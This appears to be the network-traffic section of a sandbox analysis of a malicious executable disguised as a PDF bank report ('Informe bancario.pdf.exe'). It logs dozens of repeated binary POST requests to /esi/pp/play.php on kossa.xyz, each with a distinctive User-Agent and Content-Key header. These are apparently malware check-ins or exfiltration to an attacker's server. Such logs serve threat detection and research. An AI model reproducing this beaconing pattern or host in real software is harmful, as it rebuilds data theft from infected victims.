Jun 23, 2022 17:55:15.450156927 CEST	1362	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Az5zVGZFTjp8UJIVsr25mnNQuPqx6sYujAOPXu5NlvVO05gm%2BOdCbHP1CNU6V0PIsMANXwlKU0iprTk9ImJaLHLGsgKLWrRNBCaiu%2FM8KhdYAvY4x7eWQ0JaV%2Bw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe682b5b2290a0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49780	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:16.534873009 CEST	1406	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:16.906121969 CEST	1445	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9DCxtCUH7NJO56%2Bji8yNiiCJJUgJDBZTOFQ74frU1ObyxO%2F4yOA9ipX6bhRPjdAqvI9ZQ1w6oh0Rh4V58WBQaQEbC8XSU5zs1FYK9hVxC%2FFCS8PYXg4YoUngegM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68345ad99bfe-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49792	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:18.935502052 CEST	1559	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:19.293885946 CEST	1595	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tvfj2PE6%2FzpvjRTad2HQGf3EmXoAygqppJ4GMoSzXIKEC9Kqx9btv3UYlJEN3dn3qCQiIHQCkSAYOzM%2B5iLgjP69WWrpi3AVPe3xJD6VNGtajlHFHll17GGpOvI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe684359949122-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49803	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:20.890777111 CEST	1693	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:21.252073050 CEST	1829	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKcjv7S0QT5ZJpVTvL7w3xtBMIYOOqiKId0%2BZb%2BJWAkvE4DfQZms%2FQbhb%2BqwW9ZSf5qscvDJiVACPx0SUAt0P2GDUabDptN6K7exXQzxYmUvFD3oHPdEpm7F%2Bi0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe684f9a0a694b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49813	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:22.328152895 CEST	1883	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:22.691435099 CEST	1890	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3PTxemW0dpmMPKHg6J4ZsV3RIVrE%2B1D6NlYV6EaBb0CcFK4SCwX0W%2BcytmanNrEq5gg7yjHWmhtqCOwdXena8YdQgcE7Ahjm15Asa3sXW%2FHrISTw9iwetiveUDk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68589bba9299-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49816	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:26.329556942 CEST	2012	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:26.709573984 CEST	2013	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMMV0Dl8Wspxba7npT6232CcTfyb%2FKLdRqvKQ8FX2nkMR5DilrH%2FC9o%2BbS5hpPrY7BBkeQjY1WEnkPkTLaZt1oLl3lpNanQlhMp%2BfYG6o%2BPcNqu%2FhHuBz84ConA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68719a0e063d-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49831	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:33.546350956 CEST	2647	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:33.938213110 CEST	2691	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jUz%2FxTt4iIhJ2PwKINyhFTvj3fDL%2FtQxy7yK4hOYTJZEgvXmXcUwybmZuRWoCmr%2B%2BSCOYt2yJKsyQ%2B5n%2FzDvLj8qUPA%2BLCjB48JsEsZUy8ZrHzGAOf%2BjC3ptrQY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe689eb8ed74c1-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49835	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:36.607918024 CEST	2772	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:36.962721109 CEST	2773	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bbUVXooaIDaeng5rUL%2BPRXKVBsU3sIVHHZmUwvwtYqyrsEzj1XGev9%2F22vst8zBf4AuCJEevAIPszi07TW8pFOJDFqbk%2F4sPNcdIxI38tFcEI4pJhXdDFVe2x0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68b1dce19bd7-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49744	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:38.472163916 CEST	1151	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:38.845036030 CEST	1152	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RqbB9AlMckjRfLEXC38HUt8viJ2CR%2FdVWCxsO%2BoHbSN0xpni4oUpMZeSqUIbFeVVkL%2Bs3vYMe6TfFwzCv3eFt4urQt%2BRsoBtSMZHf4OabSRk9sogB2WT1NRzmJw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe67468dd5066a-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49836	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:40.617403984 CEST	2774	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:40.986800909 CEST	2775	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ANdlC7UcGEh5m1HTK4j05IcjtMfBzgJh5Bk0%2F1gTeCj7nKEReTxIjP3M27aQCKBZnXI5hpnyapmd7muKDc%2BnHx4CATt8a6shCXMY7iAq5J6iHAUpkuHva6YTDMQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68cae972909a-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49837	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:42.276335001 CEST	2776	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:42.633047104 CEST	2777	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vD6qVK3%2FIKCTz3ypf%2B%2BSFPqEGaeZl7P4VwGxW45KkPFK3KKj9oosoyquUmxU%2BFb0QUhS4XVrMZ8KAPc0SQ5bLsTfRyLBMAlicdN5sDAMpCml%2Bo6cPzoVs9qetD0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68d539ffbbe3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49843	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:45.763231993 CEST	10854	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:46.128196955 CEST	10855	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S5%2F%2BqadrXgtz7ThItXIn%2BgXfmW6anzeh%2B591CEK9NUq9PUr9xCCDD2rPgsy47qrPKFdFhBQe6aLeBSHsBeHgoMNVGjoH4K3JjgxgTLkwD34Q0h8ZzAgnm%2B0V7c4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe68eb08ee9968-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49844	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:50.553164959 CEST	10856	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:50.924413919 CEST	10857	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hfT0dqYjL9yLERBu%2B0sBFWEaQwB1CFa4P4%2F3gtXP70TXSuvW%2BjG%2FsudrDNG2FZ45zuEl6yORiI%2FR7y0tleWWIsdTKyDDCWQAale%2F6MIiGv811PRy5Lwf4zIJRIg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe6909096006fd-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49845	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:53.427871943 CEST	10858	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:53.809928894 CEST	10859	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U7w7ZObQTczgnUXCgqSSevKrB7lFywSSahWQWOgXL9uCuGP3EUsTbSA6o9En7vWfs3JmQw5s2aWYHUQ62N0Pd%2BTAVL1pub0j5LS%2Fvv2HuOUctIeHAnXDdAde%2FnY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe691afa2a7759-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49852	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:55.592533112 CEST	12570	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:55.968697071 CEST	12575	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rR2Fy%2Bwc4EZFcdXZNOqIPOlDYFTsMbpUIOxIEKz0CCsR6evutYm1eMB79hESwqsLh2DsNHI8jmlVPOt%2FLVnW2cxU6Wtjh0NXEShIlQ3bQ6%2FPC7qTtlsGpBmgkaQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe692889f971da-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.3	49859	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:55:58.152467966 CEST	12585	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:55:58.564342022 CEST	12589	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:55:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j2xTysUgyBlv%2BGF%2BfyzX4Pqe81ORHNTjt%2FIAVNurbCNW8c8BnicNZm2P1zchzR43ui4aGlHmPlox69fxKVbfa8IffG%2FUSLJ8z9sptvHtOFCdoOzjVUU%2FRKK8OPM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69388842068e-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.3	49865	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:00.557523966 CEST	12598	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:00.910413980 CEST	12603	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ze9NFrHZ9IrfuGLxpPvBcSsLm0UomgLk8jPtdqquFlynktDCPfbpkVpR%2FYw4hD7WEGv%2B0MUqREfXG6Kk%2Bqj5B0rKQEMEfEOGC4RuR2zK%2F7ISS9%2Fj4ptzO%2FJudJo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69478bbf9962-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.3	49872	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:02.086133957 CEST	12614	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:02.444869041 CEST	12617	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S1WHOas3vJ7ZFYUp%2FoVVUCVxkbE%2B%2Fp%2B49GWBt85%2By8aInE%2Fgiju3xDMXtJloEZtOOoh0Qkt1%2FZQmQhzHs1QcSgmJ3isNDFUTbBPQR%2BKK%2FfS%2FNBvX4LpQuHNNmZ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe69510ec4909d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.3	49873	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:04.198158026 CEST	12618	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:56:04.571379900 CEST	12619	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:56:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=omOyIa%2FbwaXPJ05s%2FswmCZgfnEZ7LUKirOKbYW7ZqLOA%2BDqopKYCA80lwyTggiJdFJRy5LHqQXRYDuDGIw%2FBTrZq3IZvAVcLr9l98RagC6y3fNEi8XGjdLs5zR0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe695e4dcc76c5-LHR alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49745	104.21.40.153	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:54:39.886492014 CEST	1153	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
Jun 23, 2022 17:54:40.249713898 CEST	1154	IN	HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2022 15:54:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=On2%2FpBbJ8An%2FGT14pb6QnHaMiacGEvLWqvhnE5%2FSD4rLjnj6Rg8CaXBDk5x6PgGIs1zw%2F9xQzIw34H4JV5ysx6pavr9OaSBZznt7OiXOPZ7yuub0vKY0I4ucXdc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 71fe674f5bcf9113-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.3	49875	172.67.154.72	80	C:\Users\user\Desktop\Informe bancario.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Jun 23, 2022 17:56:08.656582117 CEST	12624	OUT	POST /esi/pp/play.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: kossa.xyz Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 690A3530 Content-Length: 163 Connection: close
